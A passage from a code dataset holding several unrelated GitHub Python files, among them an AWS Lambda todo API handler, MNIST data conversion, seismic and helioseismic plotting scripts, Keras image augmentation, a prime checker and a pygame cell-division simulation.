4)","repo_name":"mojojojo99/Detect-Avoid","sub_path":"imageSeg/custom_generator.py","file_name":"custom_generator.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39660347868","text":"import json\nfrom datetime import datetime\nfrom dynamo_model import TodoModel\n\nprint(\"Loading function\")\n\n\ndef respond(err, res=None):\n return {\n \"statusCode\": \"400\" if err else \"200\",\n \"body\": err.message if err else json.dumps(res),\n \"headers\": {\n \"Content-Type\": \"application/json\",\n },\n }\n\n\ndef parse_item(pynamodb_item):\n return {\n \"id\": pynamodb_item.id,\n \"name\": pynamodb_item.name,\n \"created_at\": pynamodb_item.created_at,\n \"status\": pynamodb_item.status,\n \"completed_at\": pynamodb_item.completed_at,\n }\n\n\ndef generate_timestamp():\n now = datetime.now()\n return now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n\n\ndef list_items():\n return [parse_item(pynamodb_item) for pynamodb_item in TodoModel.scan()]\n\n\ndef create_item(item_id, payload):\n todo = TodoModel(item_id)\n todo.name = payload.get(\"name\")\n todo.created_at = generate_timestamp()\n todo.save()\n return parse_item(todo)\n\n\ndef update_item(item_id, payload):\n todo = TodoModel.get(item_id)\n todo.name = payload.get(\"name\") or todo.name\n if payload.get(\"status\"):\n todo.status = payload.get(\"status\")\n todo.completed_at = generate_timestamp()\n todo.save()\n return parse_item(todo)\n\n\ndef delete_item(item_id):\n todo = TodoModel.get(item_id)\n todo.delete()\n return parse_item(todo)\n\n\ndef cors_preflight_request():\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Access-Control-Allow-Headers\": \"*\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"*\",\n },\n \"body\": json.dumps(\"Hello from Lambda!\"),\n }\n\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n\n operations = {\n \"GET\": list_items,\n \"POST\": create_item,\n \"PUT\": update_item,\n \"DELETE\": delete_item,\n }\n\n operation = event[\"httpMethod\"]\n\n if operation == \"OPTIONS\":\n return cors_preflight_request()\n\n if operation == \"GET\":\n return respond(None, operations[operation]())\n\n item_id = event[\"pathParameters\"].get(\"proxy\")\n if operation == \"DELETE\":\n return respond(None, operations[operation](item_id))\n elif operation in [\"POST\", \"PUT\"]:\n payload = json.loads(event[\"body\"])\n return respond(None, operations[operation](item_id, payload))\n else:\n return respond(ValueError('Unsupported method \"{}\"'.format(operation)))\n","repo_name":"jonwils24/todo-app","sub_path":"terraform/modules/api/lambdas/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38584807858","text":"\r\nimport numpy as np\r\nimport hickle as hkl\r\nimport matplotlib as plt\r\nfrom sklearn import preprocessing as p\r\nmnist_size=10000\r\nLENGTH_OF_VID =20*4000#20*50#20*10000##50#20*10000#20*mnist_size # For later experiments, modify size as necessary20*1000\r\nIM_SZ_WID = 64\r\nIM_SZ_HGT=64\r\nVIDEO_CHANNELS = 1\r\n\r\n\r\ntrain_video=np.load(\"mnist_test_seq.npy\")\r\n\r\n\r\ndef video_generator():\r\n in_video = np.empty([LENGTH_OF_VID , IM_SZ_HGT, IM_SZ_WID, VIDEO_CHANNELS], dtype=np.float32)#LENGTH_OF_VID was 1st attribute\r\n # in_video[:,:,:,:] = 1 # set background of 1st channel to white\r\n \r\n # train_video = np.zeros((n_frames, row, col, 1), dtype=np.float)\r\n \r\n # for i in range(0,LENGTH_OF_VID):\r\n count =0\r\n for i in range (6001, 4000+6000):#):#10000):\r\n gray_frame= train_video[:,i,:,:]\r\n # gray_frame = np.multiply((1/255.0), gray_frame)\r\n gray_frame = np.expand_dims(gray_frame, axis=3)\r\n in_video[0+count:count+20,:,:,:]= np.copy(gray_frame)\r\n count=count+20\r\n return in_video\r\n \r\n\r\ndef save_as_hickle():\r\n in_video = video_generator()\r\n num_frames = in_video.shape[0]\r\n print(in_video.shape)\r\n source_string = [\"mnist\"]*num_frames\r\n # dump data to file\r\n print( in_video.shape)\r\n hkl.dump(in_video, 'kitti_data/4000_mnist_data1.hkl', mode='w')\r\n # dump names to file\r\n hkl.dump(source_string, 'kitti_data/4000_mnist_sources1.hkl', mode='w')\r\n \r\n \r\nsave_as_hickle()","repo_name":"NellyElsayed/rgcLSTM","sub_path":"numpy_to_hkl.py","file_name":"numpy_to_hkl.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"31396535875","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\ndef readBinaryArray(n,filename):\n return np.fromfile(filename, dtype = np.float32, count = n)\n\ndef readBinaryMatrix(n1,n2,filename):\n data = np.fromfile(filename, dtype = np.float32, count = n1*n2) \n return np.reshape(data, [n1,n2], order='F')\n\ndef readBinaryVolume(n1,n2,n3,filename):\n data = np.fromfile(filename, dtype = np.float32, count = n1*n2*n3) \n return np.reshape(data, [n1,n2,n3], order='F')\n\ndef analytical_firstArrival(v, z, x):\n direct_wave = x / v[0]\n\n first_arrivals = np.zeros(len(x))\n refracted_waves = np.zeros((len(z), len(x)))\n\n for n in range(len(z)):\n refracted_waves[n,:] = x / v[n+1]\n for i in range(n+1):\n angle = np.arcsin(v[i] / v[n+1])\n refracted_waves[n,:] += 2.0*z[i]*np.cos(angle) / v[i]\n \n for offset in range(len(x)):\n first_arrivals[offset] = np.min(np.append(refracted_waves[:, offset], direct_wave[offset]))\n\n return first_arrivals\n\ndef check_geometry(models, shots, nodes, dh, slices, subplots, scale = 2.0):\n \n if np.sum(subplots) == 2:\n modelShape = np.array(np.shape(models))\n maxModelDistance = np.max(np.shape(models))\n minModelDistance = np.min(np.shape(models))\n\n vmin = np.min(models)\n vmax = np.max(models)\n\n else:\n modelShape = np.array(np.shape(models[0]))\n maxModelDistance = np.max(np.shape(models[0]))\n minModelDistance = np.min(np.shape(models[0]))\n\n vmin = np.min(models[0])\n vmax = np.max(models[0])\n\n nz, nx, ny = modelShape\n [z, x, y] = scale * (minModelDistance / maxModelDistance) * modelShape / maxModelDistance\n\n px = 1/plt.rcParams['figure.dpi'] \n ticks = np.array([3,7,7], dtype = int)\n\n fig = plt.figure(1, figsize=(910*px*subplots[1], 780*px*subplots[0]))\n\n xloc = np.linspace(0,nx-1,ticks[1], dtype = int)\n yloc = np.linspace(0,ny-1,ticks[2], dtype = int)\n zloc = np.linspace(0,nz-1,ticks[0], dtype = int)\n\n m2km = 1e-3\n\n xlab = np.around(xloc * dh[0] * m2km, decimals = 1)\n ylab = np.around(yloc * dh[1] * m2km, decimals = 1)\n zlab = np.around(zloc * dh[2] * m2km, decimals = 1)\n\n axes = np.array([[0.75 - x, 0.98 - y , x, y], \n [ 0.75, 0.98 - y , z, y],\n [0.75 - x, 0.98 - y - z , x, z],\n [0.75 - x, 0.98 - y - 1.8*z, x, z]])\n\n xTickDirection = ['out', 'out', 'out']\n yTickDirection = ['out', 'in', 'out']\n\n xTickLock = [xloc, zloc[1:], xloc]\n yTickLock = [yloc, yloc, zloc[1:]]\n\n xTickLabel = [[], zlab[1:], xlab]\n yTickLabel = [ylab, [], zlab[1:]]\n\n xLabel = [\"X [km]\", \"Z [km]\", \"X [km]\"]\n yLabel = [\"Y [km]\", \" \", \"Z [km]\"]\n\n yInvert = [True, True, False]\n\n xSlices = [[np.arange(modelShape[1]), np.ones(modelShape[1])*slices[1], \"--g\"],\n [np.arange(modelShape[0]), np.ones(modelShape[0])*slices[1], \"--g\"],\n [np.arange(modelShape[1]), np.ones(modelShape[1])*slices[0], \"--r\"]] \n\n ySlices = [[np.ones(modelShape[2])*slices[2], np.arange(modelShape[2]), \"--m\"],\n [np.ones(modelShape[2])*slices[0], np.arange(modelShape[2]), \"--r\"],\n [np.ones(modelShape[0])*slices[2], np.arange(modelShape[0]), \"--m\"]]\n\n # picking geometry \n\n zy_plane_shot_y = np.array([])\n zy_plane_shot_z = np.array([])\n\n if np.size(shots) != 3:\n for i in range(len(shots)): \n if int(shots[i,0]/dh[0])-1 <= int(slices[2]) <= int(shots[i,0]/dh[0])+1:\n zy_plane_shot_y = np.append(zy_plane_shot_y, shots[i,1]/dh[1]) \n zy_plane_shot_z = np.append(zy_plane_shot_z, shots[i,2]/dh[2]) \n else:\n if int(shots[0]/dh[0])-1 <= int(slices[2]) <= int(shots[0]/dh[0])+1:\n zy_plane_shot_y = np.append(zy_plane_shot_y, shots[1]/dh[1]) \n zy_plane_shot_z = np.append(zy_plane_shot_z, shots[2]/dh[2]) \n\n zx_plane_shot_x = np.array([])\n zx_plane_shot_z = np.array([]) \n\n if np.size(shots) != 3:\n for i in range(len(shots)):\n if int(shots[i,1]/dh[1])-1 <= int(slices[1]) <= int(shots[i,1]/dh[1])+1:\n zx_plane_shot_x = np.append(zx_plane_shot_x, shots[i,0]/dh[0]) \n zx_plane_shot_z = np.append(zx_plane_shot_z, shots[i,2]/dh[2]) \n else:\n if int(shots[1]/dh[1])-1 <= int(slices[1]) <= int(shots[1]/dh[1])+1:\n zx_plane_shot_x = np.append(zx_plane_shot_x, shots[0]/dh[0]) \n zx_plane_shot_z = np.append(zx_plane_shot_z, shots[2]/dh[2]) \n \n zy_plane_node_y = np.array([])\n zy_plane_node_z = np.array([])\n\n if np.size(nodes) != 3:\n for i in range(len(nodes)):\n if int(nodes[i,0]/dh[0])-1 <= int(slices[2]) <= int(nodes[i,0]/dh[0])+1:\n zy_plane_node_y = np.append(zy_plane_node_y, nodes[i,1]/dh[1]) \n zy_plane_node_z = np.append(zy_plane_node_z, nodes[i,2]/dh[2]) \n else:\n if int(nodes[0]/dh[0])-1 <= int(slices[2]) <= int(nodes[0]/dh[0])+1:\n zy_plane_node_y = np.append(zy_plane_node_y, nodes[1]/dh[1]) \n zy_plane_node_z = np.append(zy_plane_node_z, nodes[2]/dh[2]) \n\n zx_plane_node_x = np.array([])\n zx_plane_node_z = np.array([]) \n\n if np.size(nodes) != 3:\n for i in range(len(nodes)):\n if int(nodes[i,1]/dh[1])-1 <= int(slices[1]) <= int(nodes[i,1]/dh[1])+1:\n zx_plane_node_x = np.append(zx_plane_node_x, nodes[i,0]/dh[0]) \n zx_plane_node_z = np.append(zx_plane_node_z, nodes[i,2]/dh[2]) \n else:\n if int(nodes[1]/dh[1])-1 <= int(slices[1]) <= int(nodes[1]/dh[1])+1:\n zx_plane_node_x = np.append(zx_plane_node_x, nodes[0]/dh[0]) \n zx_plane_node_z = np.append(zx_plane_node_z, nodes[2]/dh[2]) \n \n #-------------------------------------------------------------------------------- \n\n subfigs = fig.subfigures(subplots[0], subplots[1])\n \n for i in range(subplots[0]):\n for j in range(subplots[1]):\n\n ind = i*subplots[0] + j \n\n if np.sum(subplots) == 2:\n ims = [models[slices[0],:,:].T, models[:,slices[2],:].T, models[:,:,slices[1]]]\n else:\n ims = [models[ind, slices[0],:,:].T, models[ind,:,slices[2],:].T, models[ind,:,:,slices[1]]]\n\n if np.size(shots) != 3:\n xshot = [shots[:,0]/dh[0],zy_plane_shot_z,zx_plane_shot_x]\n yshot = [shots[:,1]/dh[1],zy_plane_shot_y,zx_plane_shot_z]\n else:\n xshot = [shots[0]/dh[0],zy_plane_shot_z,zx_plane_shot_x]\n yshot = [shots[1]/dh[1],zy_plane_shot_y,zx_plane_shot_z]\n\n if np.size(nodes) != 3:\n xnode = [nodes[:,0]/dh[0],zy_plane_node_z,zx_plane_node_x]\n ynode = [nodes[:,1]/dh[1],zy_plane_node_y,zx_plane_node_z]\n else:\n xnode = [nodes[0]/dh[0],zy_plane_node_z,zx_plane_node_x]\n ynode = [nodes[1]/dh[1],zy_plane_node_y,zx_plane_node_z]\n\n for k, axs in enumerate(axes): \n if subplots[0] == 1:\n if subplots[1] == 1:\n ax = subfigs.add_axes(axs) \n else:\n ax = subfigs[j].add_axes(axs)\n elif subplots[1] == 1:\n if subplots[0] == 1:\n ax = subfigs.add_axes(axs) \n else: \n ax = subfigs[i].add_axes(axs)\n else:\n ax = subfigs[i,j].add_axes(axs)\n\n # Setting colorbar\n if k == 3:\n ax.axis(\"off\")\n cmap = mpl.colormaps[\"jet\"]\n norm = mpl.colors.Normalize(vmin*1e-3, vmax*1e-3)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"bottom\", size=\"10%\", pad=0)\n cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax = cax, ticks = np.linspace(vmin*1e-3, vmax*1e-3, 5), orientation = \"horizontal\")\n cbar.ax.set_xticklabels(np.around(np.linspace(vmin*1e-3, vmax*1e-3, 5), decimals = 1))\n cbar.set_label(\"Velocity [km/s]\")\n \n # plotting model slices \n else:\n ax.imshow(ims[k], aspect = 'auto', cmap = \"jet\", vmin = vmin, vmax = vmax) \n\n ax.plot(xSlices[k][0], xSlices[k][1], xSlices[k][2], linewidth = 0.5)\n ax.plot(ySlices[k][0], ySlices[k][1], ySlices[k][2], linewidth = 0.5)\n \n ax.scatter(xshot[k], yshot[k], s = 20.0, color = \"brown\")\n ax.scatter(xnode[k], ynode[k], s = 20.0, color = \"gray\")\n\n ax.tick_params(direction = xTickDirection[k], axis='x') \n ax.tick_params(direction = yTickDirection[k], axis='y') \n \n ax.set_xticks(xTickLock[k])\n ax.set_yticks(yTickLock[k])\n\n ax.set_xticklabels(xTickLabel[k])\n ax.set_yticklabels(yTickLabel[k])\n \n ax.set_xlabel(xLabel[k])\n ax.set_ylabel(yLabel[k])\n \n if yInvert[k]:\n ax.invert_yaxis()\n \n return None\n\n#-------------------------------------------------------------------------\n\nnx = 881\nny = 881\nnz = 201\n\ndx = 25\ndy = 25\ndz = 25\n\nmodel = readBinaryVolume(nz, nx, ny, f\"../inputs/models/testModel_{nz}x{nx}x{ny}_{dx}m.bin\")\n\nshots_file = \"../inputs/geometry/xyz_shot_positions.txt\"\nnodes_file = \"../inputs/geometry/xyz_node_positions.txt\"\n\nshots = np.loadtxt(shots_file, delimiter = ',')\nnodes = np.loadtxt(nodes_file, delimiter = ',')\n\nsubplots = np.array([1, 1], dtype = int)\nslices = np.array([nz/2, nx/2, ny/2], dtype = int) # [xy, zy, zx]\ndh = np.array([dx, dy, dz])\n\ncheck_geometry(model, shots, nodes, dh, slices, subplots, 2.8)\nplt.savefig(f\"modelTest.png\", dpi = 200)\n\n#-------------------------------------------------------------------------\n\nv = np.array([1500, 2000, 3000, 4000])\nz = np.array([1000, 1500, 2000])\n\nx = np.sqrt((nodes[:,0] - shots[0])**2 + (nodes[:,1] - shots[1])**2)\n\nfba = analytical_firstArrival(v, z, x)\n\nn = 1256\n\ndh = np.array([100, 50, 25], dtype = int)\n\npod = np.zeros((len(dh), n))\nfim = np.zeros((len(dh), n))\nfsm = np.zeros((len(dh), n))\n\nfor i in range(len(dh)):\n \n pod[i] = np.fromfile(f\"../outputs/first_arrivals/{dh[i]}m_pod_data_nRec1256_shot_1.bin\", dtype = np.float32, count = n)\n fim[i] = np.fromfile(f\"../outputs/first_arrivals/{dh[i]}m_fim_data_nRec1256_shot_1.bin\", dtype = np.float32, count = n)\n fsm[i] = np.fromfile(f\"../outputs/first_arrivals/{dh[i]}m_fsm_data_nRec1256_shot_1.bin\", dtype = np.float32, count = n)\n\noffset = np.arange(n)\n\ncolors = [\"blue\", \"orange\", \"green\"]\nstyles = [\"dashed\", \"dotted\", \"solid\"]\ntitles = [\"Podvin & Lecomte (1991)\", \"Jeong & Whitaker (2008)\", \"Detrixhe et al. (2013) | Noble et al. (2014)\"]\n\nxloc = np.linspace(0, n, 11, dtype = int)\n\nfig, ax = plt.subplots(nrows = 3, ncols = 2, figsize = (15,8))\n\nax[0,0].plot(fba, color = \"black\")\nax[1,0].plot(fba, color = \"black\")\nax[2,0].plot(fba, color = \"black\")\n\nfor k in range(len(dh)):\n ax[0,0].plot(offset, pod[k], linestyle = styles[k], color = colors[0])\n ax[1,0].plot(offset, fim[k], linestyle = styles[k], color = colors[1])\n ax[2,0].plot(offset, fsm[k], linestyle = styles[k], color = colors[2])\n ax[0,1].plot(offset, fba - pod[k], linestyle = styles[k], color = colors[0])\n ax[1,1].plot(offset, fba - fim[k], linestyle = styles[k], color = colors[1])\n ax[2,1].plot(offset, fba - fsm[k], linestyle = styles[k], color = colors[2])\n\n for i in range(len(dh)):\n ax[i,0].set_xlabel(\"Trace index\", fontsize= 15)\n ax[i,0].set_ylabel(\"Time [s]\", fontsize = 15)\n ax[i,0].set_title(titles[i], fontsize = 18)\n\n ax[i,1].set_xlabel(\"Trace index\", fontsize = 15)\n ax[i,1].set_ylabel(\"Diff = Ta - Tn [s]\", fontsize = 15)\n ax[i,1].set_title(titles[i], fontsize = 18)\n\n for i in range(2):\n ax[k,i].set_xticks(xloc)\n ax[k,i].set_xticklabels(xloc)\n ax[k,i].set_xlim([0,n])\n\n ax[k,0].set_ylim([5.6, 6.4])\n ax[k,0].invert_yaxis()\n\nplt.tight_layout()\nplt.savefig(f\"accuracyTest.png\", dpi = 200)\n\n#-------------------------------------------------------------------------\n\nbenchmark = np.loadtxt(\"runTime.txt\", delimiter = \";\", comments = \"#\")\n\nbench_pod = benchmark[:3]\nbench_fim = benchmark[3:6]\nbench_fsm = benchmark[6:]\n\nyaxis = [\"Elapsed time [s]\", \"RAM usage [MB]\", \"GPU memory usage [MB]\"]\n\nxloc = [0, 1, 2]\nxlab = [\"2.9\", \"19.6\", \"156.1\"]\n\nfig, ax = plt.subplots(nrows = 3,ncols = 1, figsize = (10,9))\n\nfor i in range(len(dh)):\n ax[i].plot(bench_pod[:,i], \"o--\", label = \"Podvin & Lecomte (1991)\")\n ax[i].plot(bench_fim[:,i], \"o--\", label = \"Jeong & Whitaker (2008)\")\n ax[i].plot(bench_fsm[:,i], \"o--\", label = \"Detrixhe et al. (2013) | Noble et al. (2014)\")\n\n ax[i].set_xticks(xloc)\n ax[i].set_xticklabels(xlab)\n\n ax[i].legend(loc = \"upper left\")\n ax[i].set_ylabel(yaxis[i], fontsize = 15)\n ax[i].set_xlabel(\"Total samples in model [x 10⁶]\", fontsize = 15)\n\nplt.tight_layout()\nplt.savefig(f\"benchmarkTest.png\", dpi = 200)\n","repo_name":"phbastosa/SeisFAT3D","sub_path":"tests/modeling/generate_figures.py","file_name":"generate_figures.py","file_ext":"py","file_size_in_byte":13591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26275652815","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2019/12/27 15:48\n# @Author : xiaoxiong\n# @Email : xyf_0704@sina.com\n# @File : data_aug.py\n# @Software: PyCharm\n# DESC :\n\"\"\"\nfrom keras.preprocessing.image import ImageDataGenerator\n\npath = 'VOCdevkit' # 类别子文件夹的上一级\n\ndst_path = 'E:/C3D_Data/train_result'\n\n# 图片生成器\n\ndatagen = ImageDataGenerator(\n rotation_range=5,\n width_shift_range=0.02,\n height_shift_range=0.,\n shear_range=0.,\n horizontal_flip=True,\n vertical_flip=True\n)\n\ngen = datagen.flow_from_directory(\npath,\ntarget_size=(224, 224),\nbatch_size=2,\nsave_to_dir=dst_path,#生成后的图像保存路径\nsave_prefix='aug',\nsave_format='jpg')\n\n\nfor i in range(3):\n gen.next()\n","repo_name":"xiaoxiong74/Multi_Object_Detection_and_Tracking","sub_path":"keras-yolo3/data_aug.py","file_name":"data_aug.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17482957602","text":"def isprime(n):\n\tf=0\n\tfor i in range(2,int(n**0.5)+1):\n\t\tif(n%i==0):\n\t\t\tprint (\"Non-prime\")\n\t\t\tf=1\n\t\t\tbreak\n\tif(f==0):\n\t\tprint(\"Prime\")\nx=int(input(\"Enter number \"))\nisprime(x)","repo_name":"CinnamonRolls1/it-3rd-sem","sub_path":"DSA/lab1/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30904540344","text":"#PLOTTING CORRECTION TO SHRAVAN'S KERNEL\n\t\nimport timing\nkernclock = timing.stopclock() #stopclock object for timing program\ntstamp = kernclock.lap\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport functions as fn\nfrom os import getcwd\n\ntstamp('library loading') #printing elapsed time from beginning of runtime\n\nn,l,m = 1,60,0\nn_,l_,m_ = n,l,2\nnl = fn.find_nl(n,l)\nnl_ = fn.find_nl(n_,l_)\ns = 22\nt = m_-m\n\n\n#Savitsky golay filter for smoothening\nwindow = 45 #must be odd\norder = 3\n\nif(nl == None or nl_ == None):\n\tprint(\"Mode not found. Exiting.\"); exit()\n\n#loading required functions\neig_dir = (getcwd() + '/eig_files')\nU,V = fn.load_eig(n,l,eig_dir)\nU_,V_= fn.load_eig(n_,l_,eig_dir)\nr = np.loadtxt('r.dat')\nrho = np.loadtxt('rho.dat')\n\n#interpolation params\nnpts = 30000\nr_new = np.linspace(np.amin(r),np.amax(r),npts)\n\ntstamp('files loading')\n\n#setting up shorthand repeatedly used in kernel evaluation\ndef wig_red(m1,m2,m3):\n\t'''3j symbol with upper row fixed'''\n\treturn fn.wig(l_,s,l,m1,m2,m3)\nom = fn.omega\np = (-1)**(l+l_+s) #parity of selected modes\nprefac = np.sqrt((2*l_+1.) * (2*s+1.) * (2*l+1.) / (4.* np.pi)) * wig_red(-m_,t,m)\n\n#EIGENFUCNTION DERIVATIVES\n\n#smoothing\nU,dU,d2U = fn.smooth(U,r,window,order,npts)\nV,dV,d2V = fn.smooth(V,r,window,order,npts)\n\nU_,dU_,d2U_ = fn.smooth(U_,r,window,order,npts)\nV_,dV_,d2V_ = fn.smooth(V_,r,window,order,npts)\n\nrho_sm, __, __ = fn.smooth(rho,r,window,order,npts)\n#re-assigning with smoothened variables\nr = r_new\nrho = rho_sm\n\n##no smoothing\n#dU, dV = np.gradient(U,r), np.gradient(V,r)\n#dU_, dV_ = np.gradient(U_,r), np.gradient(V_,r)\n#d2U_,d2V = 0.,0.\n\n\n#B-- EXPRESSION\nBmm = -r*(wig_red(0,-2,2)*om(l,0)*om(l,2)*V*dU_ + wig_red(2,-2,0)*om(l_,0)* \\\n\t\tom(l_,2)*V_*dU)\nBmm += wig_red(1,-2,1)*om(l_,0)*om(l,0)*(U-V)*(U_ - V_ + r*dV_)\nBmm *= ((-1)**m_)*prefac/(r**2)\n\n#B-- EXTRA\nBmm_ = om(l_,0)*(wig_red(2,-2,0)*om(l_,2)*U*(V_ - r*dV_) + om(l,0)*V \\\n\t\t*(wig_red(3,-2,-1)*om(l_,2)*om(l_,3)*V_ + wig_red(1,-2,1) \\\n\t\t*(-U_ + V_ + om(l_,2)**2 *V_ - r*dV_)))\nBmm_ *= (-1)**(1+m_) *prefac/r**2\n\n#B0- EXPRESSION\nB0m = wig_red(1,-1,0)*om(l_,0)*(U - (om(l,0)**2)*V)*(U_ - V_ + r*dV_)\nB0m += om(l,0)*(om(l_,0)*(wig_red(-1,-1,2)*om(l,2)*V*(U_ - V_ + r*dV_) \\\n + 2*r*wig_red(2,-1,-1)*om(l_,2)*V_*dV) + wig_red(0,-1,1) \\\n\t *((U-V)*(2*U_ - 2*(om(l_,0)**2)*V_ - r*dU_) + r**2 * dU_*dV))\nB0m *= 0.5*((-1)**m_)*prefac/r**2\n#B0- EXTRA\nB0m_ = om(l,0)*V*(wig_red(2,-1,-1)*om(l_,0)*om(l_,2)*(U_ - 3*V_ + r*dV_) \\\n\t\t+ wig_red(0,-1,1)*((2+om(l_,0)**2)*U_ - 2*r*dU_ + om(l_,0)**2 \\\n\t\t*(-3*V_ + r*dV_)))\nB0m_ += wig_red(1,-1,0)*om(l_,0)*U*(U_ - V_ - r*(dU_ - dV_ + r*d2V_))\nB0m_ *= 0.5*((-1)**m_)*prefac/r**2\n\n#B00 OLD\nB00 = -wig_red(0,0,0)*(2*U_ - 2*om(l_,0)**2 * V_ - r*dU_)*(-2*U + 2*om(l,0)**2 *V + \\\n\t\tr*dU)\nB00 -= 2*r*(wig_red(-1,0,1) + wig_red(1,0,-1))*om(l_,0)*om(l,0) \\\n *(U_ - V_ + r*dV_)*dV\nB00 *= 0.5*((-1)**m_)*prefac/r**2\n#B00 EXTRA\nB00_ = -(wig_red(-1,0,1) + wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V*(-4*U_+2*(1+om(l_,0)**2)*V_+r*(dU_-2*dV_))\nB00_ += wig_red(0,0,0)*U*(2*U_-2*r*dU_-2*om(l_,0)**2 *(V_-r*dV_)+r*r*d2U_)\nB00_ *= 0.5*((-1)**m_)*prefac/r**2\n\n#B+- OLD\nBpm = -r**2 * wig_red(0,0,0)*dU_*dU \nBpm += om(l_,0)*om(l,0)*(-2*(wig_red(-2,0,2)+wig_red(2,0,-2))*om(l_,2)*om(l,2)*V_*V \\\n\t\t+ wig_red(-1,0,1)*(U-V)*(U_ - V_ + r*dV_) + wig_red(1,0,-1) \\\n\t\t*(U-V)*(U_ - V_ + r*dV_))\nBpm *= 0.5*((-1)**m_)*prefac/r**2\n#B0+- EXTRA\nBpm_ = (wig_red(-1,0,1) + wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V * (U_-V_+r*(-dU_+dV_))\nBpm_ += wig_red(0,0,0) * r*r*U*d2U_\nBpm_ *= 0.5*((-1)**m_)*prefac/r**2\n\n\ntstamp('calculations')\n\nr_start = 0.9\nstart_ind = fn.nearest_index(r,r_start)\n\nplt.subplot(2,2,1)\nplt.plot(r[start_ind:],(2*rho*Bpm)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*Bpm_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(Bpm+Bpm_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{+-}$')\n\nplt.subplot(2,2,2)\nplt.plot(r[start_ind:],(2*rho*Bmm)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*Bmm_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(Bmm+Bmm_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{--}$')\n\nplt.subplot(2,2,3)\nplt.plot(r[start_ind:],(2*rho*B0m)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*B0m_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(B0m+B0m_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{0-}$')\n\nplt.subplot(2,2,4)\nplt.plot(r[start_ind:],(2*rho*B00)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*B00_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(B00+B00_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{00}$')\n\n\n#plt.plot(r[start_ind:],(2*rho*Bpm)[start_ind:],'k-',label = '$\\mathcal{B}^{+-}$')\n##plt.plot(r[start_ind:],(rho*Bmm)[start_ind:],'r-',label = '$\\mathcal{B}^{--}$')\n##plt.plot(r[start_ind:],(2*rho*B0m)[start_ind:],'k-',label = '$\\mathcal{B}^{0-}$')\n#plt.plot(r[start_ind:],(-rho*B00)[start_ind:],'k--',label = '$\\mathcal{B}^{00}$')\n#plt.grid(True)\nplt.legend()\nplt.show()\n\ntstamp('plotting')\n\n\n\n\n\n","repo_name":"srijaniiserprinceton/Global_lorentz_stress","sub_path":"plot_kern_shravan.py","file_name":"plot_kern_shravan.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20372340312","text":"from random import *\r\nfrom time import *\r\nimport pygame\r\n\r\npygame.init()\r\n\r\n# for create growthfull point press LMB\r\n# for pause/start press Space\r\n# for exit press Esc or window cross\r\n\r\n# parametrs\r\nres = wid, hei = 1920, 1080\r\nfps = 70\r\ncol_point = 0\r\nspeed = 6\r\n\r\ngreen = pygame.Color('#008f0e')\r\ngray = pygame.Color('#a8a8a8')\r\n\r\n# creating window\r\nwin = pygame.display.set_mode(res, 0)\r\nclock = pygame.time.Clock()\r\n\r\npoints = []\r\n\r\n\r\nclass Point: # creating class for points\r\n\r\n def __init__(self, x, y, ax, ay, color, pulse):\r\n self.x = x\r\n self.y = y\r\n self.ax = ax\r\n self.ay = ay\r\n self.color = color\r\n self.pulse = pulse\r\n\r\n self.radius = 5\r\n self.stage = 5\r\n self.timer = 0\r\n self.growth = 5/self.stage\r\n\r\n def update(self):\r\n if self.pulse != 0:\r\n # moving\r\n self.x += self.ax\r\n self.y += self.ay\r\n\r\n # reflection from the wall\r\n if self.x <= 0 or self.x >= wid:\r\n self.ax = -self.ax\r\n if self.y <= 0 or self.y >= hei:\r\n self.ay = -self.ay\r\n\r\n self.pulse -= 1\r\n else:\r\n self.ax, self.ay = 0, 0\r\n\r\n self.timer += 1\r\n\r\n if self.timer - fps > 0: # checking time\r\n if self.stage != 0: # cheching on division\r\n self.radius += self.growth\r\n self.stage -= 1\r\n self.timer = 0\r\n else:\r\n self.division()\r\n\r\n pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)\r\n\r\n def division(self):\r\n sx, sy = randint(-speed, speed), randint(-speed, speed)\r\n p = randint(1, 20)\r\n \r\n points.append(Point(self.x, self.y, sx, sy, green, p))\r\n points.append(Point(self.x, self.y, -sx, -sy, green, p))\r\n\r\n points.remove(self)\r\n\r\n\r\n# creating points on window\r\nfor i in 